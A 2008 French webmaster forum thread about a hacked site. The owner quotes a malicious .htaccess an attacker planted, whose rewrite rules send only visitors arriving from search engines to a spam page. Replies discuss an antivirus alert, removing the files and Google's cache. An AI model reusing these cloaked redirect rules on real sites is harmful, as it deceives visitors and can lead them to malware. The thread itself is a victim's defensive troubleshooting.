[RESOLU] mon site hacké

deepo · 19 Mai 2008

Bonjour à tous,

Comme l'indique le titre je me suis fait hacker l'un de mes sites.
En fait c'est suite au rapport de stats que j'ai vue qu'un petit malin avait envoyé une requete du genre "lesite.com/page=http:"

J'avais vérifié sur le ftp et je n'avais pas trouvé de fichier suspect donc je n'y pensais plus.

Aujourd'hui, mon patron me dit que quand il va sur le site les myrtilles, il arrive sur une page en anglais.

Je vérifie sur mon ordi, moi c'est bon....
Sur le sien, en passant par Google et en cliquant sur le résultat de recherche, on retombe sur cette page en anglais ?????

En fait sur le serveur il y avait un fichier htaccess que je pensais à moi... mais non. il y avait ça dedans

Code:

# a0b4df006e02184c60dbf503e71c87ad                                                                                                                                                      
RewriteEngine On                                                                                                                                                      
RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [NC]                                                                                                                                                      
RewriteCond %{HTTP_REFERER}  [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=                                                                                                                                                      
RewriteCond %{HTTP_REFERER} ![?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=[^&]+(%3A|%22)                                                                                                                                                      
RewriteCond %{TIME_SEC} <59                                                                                                                                                      
RewriteRule ^.*$ /design/use/ex3/t.htm [L]                                                                                                                                                      
# a995d2cc661fa72452472e9554b5520c

Donc je l'ai remplacé par un autre bien à moi cette fois

Code:

SetEnv REGISTER_GLOBALS 0

RewriteEngine On

RewriteCond %{HTTP_HOST} ^lesmyrtilles.fr$ [NC]
RewriteRule ^(.*)$ http://www.lesmyrtilles.fr/$1 [R=301,L]

mais ça ne change rien.

Question : Est-ce que ça vient du fait que la page est dans le cache de google et si c'est ça combien de temps ça risque de durer ?

Autre question : Y a-t-il un moyen d'accélérer le processus ?

Voilà, j'espère que j'ai été assez clair dans mes explications, et si quelqu'un avait un idée sur la question...

Merci d'avance et bonne journée à tous.
Deepo

frangolacci · 19 Mai 2008

Ton site "les myrtilles" essayes d'exectuter un script (maveillant?), avast m'indique "VBS:Malware-gen",
tu devrais éditer ton message et rendre l'adresse de ton site impossible à cliquer... sinon yen a qui risquent de choper un ver :wink:

deepo · 19 Mai 2008

Salut frangolacci et merci pour l'info

Je ne suis pas au top de la sécurité...

Par contre tu m'inquiète en me disant que avast t'indique qu'il y a un script malveillant. je n'ai rien retrouvé d'autre et le site est pas bien gros...

Bon je vais revérifier.
Merci

frangolacci · 19 Mai 2008

Je suis retourné sur ton site, maintenant tout va bien, tu as retiré quelque chose?

deepo · 19 Mai 2008

Il y avait bien des fichiers plus que suspects que j'ai supprimé.
:x je suis c.. j'aurais dû les charger dans un coin pour voir d'où ça venait (tant pis)

Encore merci

et pour le problème de la page en anglais, quelqu'un a une idée...
a++

frangolacci · 19 Mai 2008

deepo a dit:
et pour le problème de la page en anglais, quelqu'un a une idée...
a++

Moi je tombe sur ton site "normal" en français, vide le cache de ton navigateur et retourne y :wink:

deepo · 19 Mai 2008

Oui pour moi pas de problème,

c'est pour les visiteurs qui ont l'habitude d'aller sur le site que j'ai un souci, c'est eux qui ont la page en anglais.

y'a plus qu'a attendre qui vide eux-même leur cache... :?

Je vais voir du côté de php si y a pas moyen de faire quelque chose

Merci frangolacci

deepo · 19 Mai 2008

Bon après une rapide recherche,
j'ai ajouté deux lignes de code dans les meta pour empêcher la mise en cache

et j'ai soumis l'url à google en espérant que la page sera revisité plus vite, parce qu'en fait le problème vient du lien affiché dans les pages de résultat.

bon je marque le sujet comme résolu.

ça mets en forme le lundi matin en arrivant au taf

A bientôt

vaxrei · 19 Mai 2008

vérifie quand même encore le code, il a pas l'air si propre que ça :

Code:

<link rel="stylesheet" href="pngHack/pngHack.css" type="text/css" />

deepo · 19 Mai 2008

Salut vaxrei

Non ça c'est à moi... c'est un truc qui gère la transparence du png pour IE avant la version 7.

merci quand même.

bonne journée

frangolacci · 19 Mai 2008

vaxrei a dit:
vérifie quand même encore le code, il a pas l'air si propre que ça :

Code:

<link rel="stylesheet" href="pngHack/pngHack.css" type="text/css" />

c'est rien, le lien fait appel à un css qui fait lui même appel à un javascript pour gérer la transparence des png... d'ailleurs c'est pratique ce truc :wink:

... c'est le mot Hack que t'as trouvé louche

EDIT : @deepo: merde on arrete pas de poster en même temps

vaxrei · 19 Mai 2008

désolé, je ne connaissais pas ce script pour la transparence. Et oui, son nom, le nom du répertoire et même le contenu du fichier css me paraissait louche.